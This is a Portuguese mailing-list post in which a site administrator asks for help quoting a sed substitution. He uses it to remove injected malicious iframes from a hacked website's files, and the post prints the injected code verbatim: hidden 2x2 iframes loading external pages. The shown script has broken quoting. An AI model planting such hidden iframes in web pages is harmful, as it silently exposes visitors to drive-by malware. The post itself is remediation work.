Ajuda com aspas duplas no sed

From: Thiago M. Figueiredo
Subject: Ajuda com aspas duplas no sed
Date: Wed, 10 Apr 2013 15:02:27 -0300

Opa Galera,

Estou tentando fazer a limpeza de um iframe em vários arquivos mais
devido a string que estou tentando substituir tem vaias aspas duplas e
não funciona.
Esse é o erro:
sed: 1: "s/<iframe src="http://m ...": bad flag in substitute command: 'm'

Esse é script que construi para fazer essa função.

SUJEIRA="<iframe src="http://my.edu.au/404.php\"; width=\"2\"
height=\"2\" frameborder=\"0\"></iframe><iframe
src=\"http://my.edu.au/404.php\"; width=\"2\" height=\"2\"
frameborder=\"0\"></iframe><iframe
src=\"http://www.tlsgroup.ru/bit.php\"; width=\"2\" height=\"2\"
frameborder=\"0\"></iframe>";
LOCAL="/usr/local/www/cidademaiscrianca/httpdocs";
ARQTEMPORARIO="/tmp/arquivo.txt"

ARQUIVOS=`grep -irn $SUJEIRA $LOCAL/* | cut -d":" -f1`;
for LIMPA in $ARQUIVOS; do
        sed "s/$SUJEIRA/ /g" $LIMPA > $ARQTEMPORARIO;
        cp $ARQTEMPORARIO $LIMPA;
        echo "Limpando arquivo $LIMPA";
done

Alguém já tentou usar sed com aspas duplas?

muito obrigado
atenciosamente,
Thiago M. Figueiredo

Thiago M. Figueiredo
address@hidden
Cel: (55 11)9472-5713
address@hidden
http://www.thiagofigueiredo.com
Open Source o conhecimento é do mundo.
Usar software proprietário R$ 450,00 com MasterCard, usar software
livre não tem preço.... mas para todos os outros softwares existem os cracks. .